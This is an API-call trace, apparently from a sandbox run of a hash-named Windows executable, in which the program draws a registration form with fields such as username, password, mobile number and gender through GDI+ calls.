[0128.032] GetLastError () returned 0x7f
[0128.032] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.032] GetLastError () returned 0x7f
[0128.032] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.032] GetLastError () returned 0x7f
[0128.032] GdipMeasureString (graphics=0x657fb88, string="Password:-", length=10, font=0x657f8e0, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.032] GetLastError () returned 0x7f
[0128.032] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.032] GetLastError () returned 0x7f
[0128.032] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.033] GetLastError () returned 0x7f
[0128.033] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.033] GetLastError () returned 0x7f
[0128.033] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.033] GetLastError () returned 0x7f
[0128.033] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.033] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.033] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.033] GetLastError () returned 0x7f
[0128.033] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279e9cc) returned 0x0
[0128.033] GetLastError () returned 0x7f
[0128.033] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.033] GetLastError () returned 0x7f
[0128.033] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.033] GetLastError () returned 0x7f
[0128.033] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.033] GetLastError () returned 0x7f
[0128.033] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.033] GetLastError () returned 0x7f
[0128.033] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.033] GetLastError () returned 0x7f
[0128.033] GdipMeasureString (graphics=0x657fb88, string="Department:-", length=12, font=0x657f598, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.033] GetLastError () returned 0x7f
[0128.033] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.033] GetLastError () returned 0x7f
[0128.033] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.034] GetLastError () returned 0x7f
[0128.034] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.034] GetLastError () returned 0x7f
[0128.034] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.034] GetLastError () returned 0x7f
[0128.034] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc08) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19db08) returned 1
[0128.034] GetSystemMetrics (nIndex=5) returned 1
[0128.034] GetSystemMetrics (nIndex=6) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc08) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19db08) returned 1
[0128.034] GetSystemMetrics (nIndex=5) returned 1
[0128.034] GetSystemMetrics (nIndex=6) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc08) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19db08) returned 1
[0128.034] GetSystemMetrics (nIndex=5) returned 1
[0128.034] GetSystemMetrics (nIndex=6) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc08) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19db08) returned 1
[0128.034] GetSystemMetrics (nIndex=5) returned 1
[0128.034] GetSystemMetrics (nIndex=6) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc08) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19db08) returned 1
[0128.034] GetSystemMetrics (nIndex=5) returned 1
[0128.034] GetSystemMetrics (nIndex=6) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc08) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19db08) returned 1
[0128.034] GetSystemMetrics (nIndex=5) returned 1
[0128.034] GetSystemMetrics (nIndex=6) returned 1
[0128.035] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc08) returned 1
[0128.035] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19db08) returned 1
[0128.035] GetSystemMetrics (nIndex=5) returned 1
[0128.035] GetSystemMetrics (nIndex=6) returned 1
[0128.035] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.035] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.035] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.035] GetLastError () returned 0x7f
[0128.035] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279eb54) returned 0x0
[0128.035] GetLastError () returned 0x7f
[0128.035] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.035] GetLastError () returned 0x7f
[0128.035] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.035] GetLastError () returned 0x7f
[0128.035] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.035] GetLastError () returned 0x7f
[0128.035] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.035] GetLastError () returned 0x7f
[0128.035] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.035] GetLastError () returned 0x7f
[0128.035] GdipMeasureString (graphics=0x657fb88, string="Last Name", length=9, font=0x657f458, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.035] GetLastError () returned 0x7f
[0128.035] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.035] GetLastError () returned 0x7f
[0128.035] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.035] GetLastError () returned 0x7f
[0128.035] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.035] GetLastError () returned 0x7f
[0128.035] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.036] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.036] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279ebbc) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] GdipMeasureString (graphics=0x657fb88, string="Middle Name", length=11, font=0x657f430, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.036] GetLastError () returned 0x7f
[0128.036] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.036] GetLastError () returned 0x7f
[0128.036] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.036] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.036] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.037] GetLastError () returned 0x7f
[0128.037] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279ec24) returned 0x0
[0128.037] GetLastError () returned 0x7f
[0128.037] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.037] GetLastError () returned 0x7f
[0128.037] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.037] GetLastError () returned 0x7f
[0128.037] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.037] GetLastError () returned 0x7f
[0128.037] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.037] GetLastError () returned 0x7f
[0128.037] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.037] GetLastError () returned 0x7f
[0128.037] GdipMeasureString (graphics=0x657fb88, string="First Name", length=10, font=0x657f408, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.037] GetLastError () returned 0x7f
[0128.037] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.037] GetLastError () returned 0x7f
[0128.037] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.037] GetLastError () returned 0x7f
[0128.037] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.037] GetLastError () returned 0x7f
[0128.037] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.037] GetLastError () returned 0x7f
[0128.037] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.037] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.037] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.038] GetLastError () returned 0x7f
[0128.038] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279ec8c) returned 0x0
[0128.038] GetLastError () returned 0x7f
[0128.038] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.038] GetLastError () returned 0x7f
[0128.038] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.038] GetLastError () returned 0x7f
[0128.038] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.038] GetLastError () returned 0x7f
[0128.038] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.038] GetLastError () returned 0x7f
[0128.038] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.038] GetLastError () returned 0x7f
[0128.038] GdipMeasureString (graphics=0x657fb88, string="Username:-", length=10, font=0x657f3e0, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.038] GetLastError () returned 0x7f
[0128.038] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.038] GetLastError () returned 0x7f
[0128.038] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.038] GetLastError () returned 0x7f
[0128.038] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.038] GetLastError () returned 0x7f
[0128.038] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.038] GetLastError () returned 0x7f
[0128.038] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.038] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.038] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.039] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279ecf4) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.039] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.039] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.039] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.039] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.039] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.039] GdipMeasureString (graphics=0x657fb88, string="Mobile Number:-", length=15, font=0x657f3b8, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.039] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.039] GetLastError () returned 0x7f
[0128.039] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.039] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.039] GetLastError () returned 0x7f
[0128.039] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.039] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.039] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.039] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.040] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279ed5c) returned 0x0
[0128.040] GetLastError () returned 0x7f
[0128.040] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.040] GetLastError () returned 0x7f
[0128.040] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.040] GetLastError () returned 0x7f
[0128.040] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.040] GetLastError () returned 0x7f
[0128.040] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.040] GetLastError () returned 0x7f
[0128.040] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.040] GetLastError () returned 0x7f
[0128.040] GdipMeasureString (graphics=0x657fb88, string="Name:-", length=6, font=0x546efc0, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.040] GetLastError () returned 0x7f
[0128.040] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.040] GetLastError () returned 0x7f
[0128.040] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.040] GetLastError () returned 0x7f
[0128.040] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.040] GetLastError () returned 0x7f
[0128.040] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.040] GetLastError () returned 0x7f
[0128.120] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19db14) returned 0x0
[0128.120] GetLastError () returned 0x7f
[0128.135] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279f100) returned 0x0
[0128.135] GetLastError () returned 0x7f
[0128.135] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.135] GetLastError () returned 0x7f
[0128.135] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x1) returned 0x0
[0128.135] GetLastError () returned 0x7f
[0128.135] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.136] GetLastError () returned 0x7f
[0128.136] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da38) returned 0x0
[0128.136] GetLastError () returned 0x7f
[0128.136] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.136] GetLastError () returned 0x7f
[0128.136] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da60) returned 0x0
[0128.136] GetLastError () returned 0x7f
[0128.137] GdipGetStringFormatTrimming (format=0x657fe68, trimming=0x19da60) returned 0x0
[0128.137] GetLastError () returned 0x7f
[0128.138] GdipGetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=0x19da60) returned 0x0
[0128.138] GetLastError () returned 0x7f
[0128.139] GdipGetStringFormatAlign (format=0x657fe68, align=0x19da60) returned 0x0
[0128.139] GetLastError () returned 0x7f
[0128.140] GdipGetStringFormatLineAlign (format=0x657fe68, align=0x19da60) returned 0x0
[0128.140] GetLastError () returned 0x7f
[0128.140] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.140] GetLastError () returned 0x7f
[0128.140] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.140] GetLastError () returned 0x7f
[0128.180] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0
[0129.489] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x6a6a0000
[0129.540] GetLastError () returned 0x0
[0129.540] GetProcAddress (hModule=0x6a6a0000, lpProcName="ImageList_WriteEx") returned 0x0
[0129.547] FreeLibrary (hLibModule=0x6a6a0000) returned 1
[0129.552] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0
[0129.582] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x6a6a0000
[0129.591] GetLastError () returned 0x7e
[0129.591] GetProcAddress (hModule=0x6a6a0000, lpProcName="ImageList_WriteEx") returned 0x0
[0129.591] FreeLibrary (hLibModule=0x6a6a0000) returned 1
[0129.639] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da48) returned 0x0
[0129.639] GetLastError () returned 0x0
[0129.641] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279f1a8) returned 0x0
[0129.641] GetLastError () returned 0x0
[0129.641] GdipSetStringFormatFlags (format=0x65801b8, flags=2048) returned 0x0
[0129.641] GetLastError () returned 0x0
[0129.647] GdipSetStringFormatTrimming (format=0x65801b8, trimming=0x1) returned 0x0
[0129.647] GetLastError () returned 0x0
[0129.647] GdipSetStringFormatHotkeyPrefix (format=0x65801b8, hotkeyPrefix=1) returned 0x0
[0129.647] GetLastError () returned 0x0
[0129.647] GdipSetStringFormatAlign (format=0x65801b8, align=0x0) returned 0x0
[0129.647] GetLastError () returned 0x0
[0129.647] GdipSetStringFormatLineAlign (format=0x65801b8, align=0x1) returned 0x0
[0129.647] GetLastError () returned 0x0
[0129.647] GdipGetStringFormatFlags (format=0x65801b8, flags=0x19da44) returned 0x0
[0129.647] GetLastError () returned 0x0
[0129.647] GdipSetStringFormatFlags (format=0x65801b8, flags=6144) returned 0x0
[0129.647] GetLastError () returned 0x0
[0129.647] GdipMeasureString (graphics=0x657fed8, string="Male", length=4, font=0x657f818, layoutRect=0x19da28, stringFormat=0x65801b8, boundingBox=0x19da18, codepointsFitted=0x19da14, linesFilled=0x19da10) returned 0x0
[0129.647] GetLastError () returned 0x0
[0129.647] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0129.647] GetLastError () returned 0x0
[0129.647] GdipDeleteStringFormat (format=0x65801b8) returned 0x0
[0129.647] GetLastError () returned 0x0
[0129.648] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0129.648] GetLastError () returned 0x0
[0129.648] GdipDeleteGraphics (graphics=0x657fed8) returned 0x0
[0129.648] GetLastError () returned 0x0
[0129.672] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0129.672] GetLastError () returned 0x0
[0129.672] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0129.672] GetLastError () returned 0x0
[0129.687] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19db14) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279f398) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x1) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da38) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da60) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipGetStringFormatTrimming (format=0x657fe68, trimming=0x19da60) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipGetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=0x19da60) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipGetStringFormatAlign (format=0x657fe68, align=0x19da60) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipGetStringFormatLineAlign (format=0x657fe68, align=0x19da60) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0129.687] GetLastError () returned 0x0
[0129.687] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0129.688] GetLastError () returned 0x0
[0129.688] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0
[0129.704] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x6a6a0000
[0129.712] GetLastError () returned 0x7e
[0129.713] GetProcAddress (hModule=0x6a6a0000, lpProcName="ImageList_WriteEx") returned 0x0
[0129.713] FreeLibrary (hLibModule=0x6a6a0000) returned 1
[0129.715] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0
[0129.719] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x6a6a0000
[0129.730] GetLastError () returned 0x7e
[0129.731] GetProcAddress (hModule=0x6a6a0000, lpProcName="ImageList_WriteEx") returned 0x0
[0129.731] FreeLibrary (hLibModule=0x6a6a0000) returned 1
[0129.733] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da48) returned 0x0
[0129.733] GetLastError () returned 0x0
[0129.734] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279f3e0) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.734] GdipSetStringFormatFlags (format=0x65801b8, flags=2048) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.734] GdipSetStringFormatTrimming (format=0x65801b8, trimming=0x1) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.734] GdipSetStringFormatHotkeyPrefix (format=0x65801b8, hotkeyPrefix=1) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.734] GdipSetStringFormatAlign (format=0x65801b8, align=0x0) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.734] GdipSetStringFormatLineAlign (format=0x65801b8, align=0x1) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.734] GdipGetStringFormatFlags (format=0x65801b8, flags=0x19da44) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.734] GdipSetStringFormatFlags (format=0x65801b8, flags=6144) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.734] GdipMeasureString (graphics=0x657fed8, string="Female", length=6, font=0x657f5e8, layoutRect=0x19da28, stringFormat=0x65801b8, boundingBox=0x19da18, codepointsFitted=0x19da14, linesFilled=0x19da10) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.734] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0129.734] GetLastError () returned 0x0
[0129.734] GdipDeleteStringFormat (format=0x65801b8) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.734] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0129.734] GetLastError () returned 0x0
[0129.734] GdipDeleteGraphics (graphics=0x657fed8) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.735] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0129.735] GetLastError () returned 0x0
[0129.735] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0129.736] GetLastError () returned 0x0
[0129.782] AdjustWindowRectEx (in: lpRect=0x19db98, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db98) returned 1
[0129.782] AdjustWindowRectEx (in: lpRect=0x19db98, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db98) returned 1
[0136.282] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6e9438 | out: hHeap=0x6c0000) returned 1
[0162.403] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19d31c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0162.404] GetLastError () returned 0x0
[0162.459] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", nBufferLength=0x105, lpBuffer=0x19d970, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", lpFilePart=0x0) returned 0x65
[0162.459] GetLastError () returned 0x57
[0162.459] SetErrorMode (uMode=0x1) returned 0x0
